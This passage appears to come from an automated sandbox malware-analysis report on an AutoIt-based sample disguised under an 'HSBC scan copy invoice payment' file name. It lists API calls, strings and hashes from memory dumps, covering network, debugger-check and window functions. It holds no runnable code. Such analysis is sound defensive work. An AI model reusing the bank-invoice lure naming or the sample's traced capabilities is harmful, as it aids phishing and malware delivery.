                    • API ID: CurrentOpenProcessThreadToken
                    • String ID:
                    • API String ID: 3974789173-0
                    APIs
                    • GetDesktopWindow.USER32 ref: 00EC2187
                    • GetDC.USER32(00000000), ref: 00EC2191
                    • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00EC21B1
                    • ReleaseDC.USER32(?), ref: 00EC21D2
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    Similarity
                    • API ID: CapsDesktopDeviceReleaseWindow
                    • String ID:
                    • API String ID: 2889604237-0
                    APIs
                    • GetDesktopWindow.USER32 ref: 00EC219B
                    • GetDC.USER32(00000000), ref: 00EC21A5
                    • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00EC21B1
                    • ReleaseDC.USER32(?), ref: 00EC21D2
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    Similarity
                    • API ID: CapsDesktopDeviceReleaseWindow
                    • String ID:
                    • API String ID: 2889604237-0
                    APIs
                      • Part of subcall function 00ED7652: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00ED758C,80070057,?,?), ref: 00ED7698
                    • _memset.LIBCMT ref: 00EF9B28
                    • _memset.LIBCMT ref: 00EF9C6B
                    Strings
                    • NULL Pointer assignment, xrefs: 00EF9CF0
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    Similarity
                    • API ID: _memset$lstrcmpi
                    • String ID: NULL Pointer assignment
                    • API String ID: 1020867613-2785691316
                    APIs
                    • OleSetContainedObject.OLE32(?,00000001), ref: 00EDB981
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    Similarity
                    • API ID: ContainedObject
                    • String ID: AutoIt3GUI$Container
                    • API String ID: 3565006973-3941886329
                    APIs
                      • Part of subcall function 00E9FEC6: _wcscpy.LIBCMT ref: 00E9FEE9
                      • Part of subcall function 00E89997: __itow.LIBCMT ref: 00E899C2
                      • Part of subcall function 00E89997: __swprintf.LIBCMT ref: 00E89A0C
                    • __wcsnicmp.LIBCMT ref: 00EEB298
                    • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 00EEB361
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    Similarity
                    • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                    • String ID: LPT
                    • API String ID: 3222508074-1350329615
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    Similarity
                    • API ID: _memmove
                    • String ID: Oa
                    • API String ID: 4104443479-3945284152
                    APIs
                    • Sleep.KERNEL32(00000000), ref: 00E92AC8
                    • GlobalMemoryStatusEx.KERNEL32(?), ref: 00E92AE1
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    Similarity
                    • API ID: GlobalMemorySleepStatus
                    • String ID: @
                    • API String ID: 2783356886-2766056989
                    APIs
                      • Part of subcall function 00E8506B: __fread_nolock.LIBCMT ref: 00E85089
                    • _wcscmp.LIBCMT ref: 00EE9AAE
                    • _wcscmp.LIBCMT ref: 00EE9AC1
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    Similarity
                    • API ID: _wcscmp$__fread_nolock
                    • String ID: FILE
                    • API String ID: 4029003684-3121273764
                    APIs
                    • _memset.LIBCMT ref: 00EF2892
                    • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00EF28C8
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    Similarity
                    • API ID: CrackInternet_memset
                    • String ID: |
                    • API String ID: 1413715105-2343686810
                    APIs
                    • DestroyWindow.USER32(?,?,?,?), ref: 00F06D86
                    • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00F06DC2
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    Similarity
                    • API ID: Window$DestroyMove
                    • String ID: static
                    • API String ID: 2139405536-2160076837
                    APIs
                    • _memset.LIBCMT ref: 00EE2E00
                    • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00EE2E3B
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    Similarity
                    • API ID: InfoItemMenu_memset
                    • String ID: 0
                    • API String ID: 2223754486-4108050209
                    APIs
                    • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00F069D0
                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00F069DB
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    Similarity
                    • API ID: MessageSend
                    • String ID: Combobox
                    • API String ID: 3850602802-2096851135
                    APIs
                      • Part of subcall function 00E81D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00E81D73
                      • Part of subcall function 00E81D35: GetStockObject.GDI32(00000011), ref: 00E81D87
                      • Part of subcall function 00E81D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00E81D91
                    • GetWindowRect.USER32(00000000,?), ref: 00F06EE0
                    • GetSysColor.USER32(00000012), ref: 00F06EFA
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: Window$ColorCreateMessageObjectRectSendStock
                    • String ID: static
                    • API String ID: 1983116058-2160076837
                    • Opcode ID: 1d54f287f626d3e6895483251d7eeac53e0a364263f222633bdec90fd314bf15
                    • Instruction ID: 54d47c454b28b71431f7c9f5e53a068684329fc2b00dfe6f2daaff23397fc71a
                    • Opcode Fuzzy Hash: 1d54f287f626d3e6895483251d7eeac53e0a364263f222633bdec90fd314bf15
                    • Instruction Fuzzy Hash: AA215972A1020AAFDB04DFA8CC45AFA7BB8FB08315F004628FD55D3290E734E861AB50
                    APIs
                    • GetWindowTextLengthW.USER32(00000000), ref: 00F06C11
                    • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00F06C20
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: LengthMessageSendTextWindow
                    • String ID: edit
                    • API String ID: 2978978980-2167791130
                    • Opcode ID: 65c569085c3fa094f9539c559347e772d8dc05b3cae283b38660a7867bc51240
                    • Instruction ID: fd3ebeae73eea4e4f925258a866e0b17b991d23423dfb5db5e0b8bc6ef000d34
                    • Opcode Fuzzy Hash: 65c569085c3fa094f9539c559347e772d8dc05b3cae283b38660a7867bc51240
                    • Instruction Fuzzy Hash: A111BCB1900208ABEB209E64DC41EFB37AAEB45378F604724F965D71E0C775DCA1BB60
                    APIs
                    • _memset.LIBCMT ref: 00EE2F11
                    • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00EE2F30
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: InfoItemMenu_memset
                    • String ID: 0
                    • API String ID: 2223754486-4108050209
                    • Opcode ID: 94294c85f6b70a5f5d1752a61eeca6c6f4e3b7b763ed0bdbd750d14b276b96b7
                    • Instruction ID: c4b10ad28f7740363b8de4cac208e423227b817a890b9f0c20f1f7657af91fbc
                    • Opcode Fuzzy Hash: 94294c85f6b70a5f5d1752a61eeca6c6f4e3b7b763ed0bdbd750d14b276b96b7
                    • Instruction Fuzzy Hash: 1311B131E0126CABDB35DE99DC44B9D77BDAB16318F0810A9EE44B72A0D770AD04D791
                    APIs
                    • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00EF2520
                    • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00EF2549
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: Internet$OpenOption
                    • String ID: <local>
                    • API String ID: 942729171-4266983199
                    • Opcode ID: 7dc327e689e4d17ed3e6073365c6d6228015562bace77012c6cb1af1071a579f
                    • Instruction ID: c4c52cfd5499096baf7df2a4ecbda51faafa41ca52128c7d4a6750377c8241c7
                    • Opcode Fuzzy Hash: 7dc327e689e4d17ed3e6073365c6d6228015562bace77012c6cb1af1071a579f
                    • Instruction Fuzzy Hash: 021106B0501229BADB248F518C95EFBFF68FF05355F10912EF70566040D3709945E6F2
                    APIs
                      • Part of subcall function 00EF830B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,00EF80C8,?,00000000,?,?), ref: 00EF8322
                    • inet_addr.WS2_32(00000000), ref: 00EF80CB
                    • htons.WS2_32(00000000), ref: 00EF8108
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: ByteCharMultiWidehtonsinet_addr
                    • String ID: 255.255.255.255
                    • API String ID: 2496851823-2422070025
                    • Opcode ID: fd636bc1562f67b99bc8969edf676a54e6a807bdc7366861d61a1ce4a74703c9
                    • Instruction ID: aa57a58eee1b19afafb4151dd965955abe902a825c38745c48d9e1085d8df0f6
                    • Opcode Fuzzy Hash: fd636bc1562f67b99bc8969edf676a54e6a807bdc7366861d61a1ce4a74703c9
                    • Instruction Fuzzy Hash: FC11E535200209ABDB20AF64CD46FFEB364FF04324F109627EA15B7291DF71A805C751
                    APIs
                      • Part of subcall function 00E87F41: _memmove.LIBCMT ref: 00E87F82
                      • Part of subcall function 00EDB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00EDB0E7
                    • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00ED9355
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: ClassMessageNameSend_memmove
                    • String ID: ComboBox$ListBox
                    • API String ID: 372448540-1403004172
                    • Opcode ID: 92161c7217e280713971fc84d4f4ab21de4d78f4fe759c981e081e3b911ff133
                    • Instruction ID: 566a32f60a4d24de23741cf861458d5ce7a7c374a802618a895e615e2e1e4479
                    • Opcode Fuzzy Hash: 92161c7217e280713971fc84d4f4ab21de4d78f4fe759c981e081e3b911ff133
                    • Instruction Fuzzy Hash: D301D271A05214ABCB04FB60CC918FE73A9FF06320B14261AB976773D2DB3198089750
                    APIs
                      • Part of subcall function 00E87F41: _memmove.LIBCMT ref: 00E87F82
                      • Part of subcall function 00EDB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00EDB0E7
                    • SendMessageW.USER32(?,00000180,00000000,?), ref: 00ED924D
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: ClassMessageNameSend_memmove
                    • String ID: ComboBox$ListBox
                    • API String ID: 372448540-1403004172
                    • Opcode ID: c12793a43875d0bd2b4636b3e1ca762a9b5322cc3ed53355388120825365f4f8
                    • Instruction ID: 2e27bc6561aae45ac9e85002e92e2336908833457bb8557dbd51ef927b8b4793
                    • Opcode Fuzzy Hash: c12793a43875d0bd2b4636b3e1ca762a9b5322cc3ed53355388120825365f4f8
                    • Instruction Fuzzy Hash: 3F01B171A41108ABCB18FBA0C9929EE73E8EF05700F24201AB91A73292EA519E099261
                    APIs
                      • Part of subcall function 00E87F41: _memmove.LIBCMT ref: 00E87F82
                      • Part of subcall function 00EDB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00EDB0E7
                    • SendMessageW.USER32(?,00000182,?,00000000), ref: 00ED92D0
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: ClassMessageNameSend_memmove
                    • String ID: ComboBox$ListBox
                    • API String ID: 372448540-1403004172
                    • Opcode ID: aea556cde3f62b55b8cea3356f03e5d1cdacdfac134f10fe5acc70fe3be80b92
                    • Instruction ID: b70bdd22ad1fa4a1a04ee45adae530d39773867cd655d36aa76e8abca063edf8
                    • Opcode Fuzzy Hash: aea556cde3f62b55b8cea3356f03e5d1cdacdfac134f10fe5acc70fe3be80b92
                    • Instruction Fuzzy Hash: 4E01A771A45108B7CB14FAA0CD82DFF77ECDF11710F242116791A73292DB619E0D9271
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: ClassName_wcscmp
                    • String ID: #32770
                    • API String ID: 2292705959-463685578
                    • Opcode ID: 6b4aa6191b8379778273db994dbd6027c667d58647b9b04758029d62d42f6e1e
                    • Instruction ID: b6e962322e76f6d18968816a71accde0b86be06bb28d58dffdcb13bb562f2778
                    • Opcode Fuzzy Hash: 6b4aa6191b8379778273db994dbd6027c667d58647b9b04758029d62d42f6e1e
                    • Instruction Fuzzy Hash: 16E0D17390432D17D7209A969C45F97F7ECEB55771F000157FD14D7050D660E94587D1
                    APIs
                    • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00ED81CA
                      • Part of subcall function 00EA3598: _doexit.LIBCMT ref: 00EA35A2
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: Message_doexit
                    • String ID: AutoIt$Error allocating memory.
                    • API String ID: 1993061046-4017498283
                    • Opcode ID: ab6a9100929dff62d425a011db969d1e00a2c93171ac064ba2333b74f9e48141
                    • Instruction ID: 411e81d5640060fc34662775db4e313528688eeced99defcd63e0359d49d8ca2
                    • Opcode Fuzzy Hash: ab6a9100929dff62d425a011db969d1e00a2c93171ac064ba2333b74f9e48141
                    • Instruction Fuzzy Hash: 63D05B323C531D36D21532B86D07FC676C88B09B55F005056BB0C795D38DD2D9D252DA
                    APIs
                      • Part of subcall function 00EBB564: _memset.LIBCMT ref: 00EBB571
                      • Part of subcall function 00EA0B84: InitializeCriticalSectionAndSpinCount.KERNEL32(00F45158,00000000,00F45144,00EBB540,?,?,?,00E8100A), ref: 00EA0B89
                    • IsDebuggerPresent.KERNEL32(?,?,?,00E8100A), ref: 00EBB544
                    • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00E8100A), ref: 00EBB553
                    Strings
                    • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00EBB54E
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                    • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                    • API String ID: 3158253471-631824599
                    • Opcode ID: d16fe9ec3f546b76e7e578116dfaad31bc38cd4506517fa84b069e215271830e
                    • Instruction ID: d33715bc77601c7321cb5f0b3b16dc9631a8965eaf59ae5fa21f921af6a9d119
                    • Opcode Fuzzy Hash: d16fe9ec3f546b76e7e578116dfaad31bc38cd4506517fa84b069e215271830e
                    • Instruction Fuzzy Hash: 6AE06D702007148FD770DF68E5043837BE4AF04714F00892CE48AD6651D7F4E508DB62
                    APIs
                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00F05BF5
                    • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00F05C08
                      • Part of subcall function 00EE54E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00EE555E
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: FindMessagePostSleepWindow
                    • String ID: Shell_TrayWnd
                    • API String ID: 529655941-2988720461
                    • Opcode ID: 673fe05ea50f03db7f18c930a8afc85518e1d40aa70ce6a39463b0c6a5affc00
                    • Instruction ID: e984906d0f86ac1392c1b94d40bf75fb5ef4cb100b1b42e4293a0de04972089e
                    • Opcode Fuzzy Hash: 673fe05ea50f03db7f18c930a8afc85518e1d40aa70ce6a39463b0c6a5affc00
                    • Instruction Fuzzy Hash: 50D01232388315B7E778BB71AC0FFE77A54BB10B55F140839B756AA1D0D9E49804D650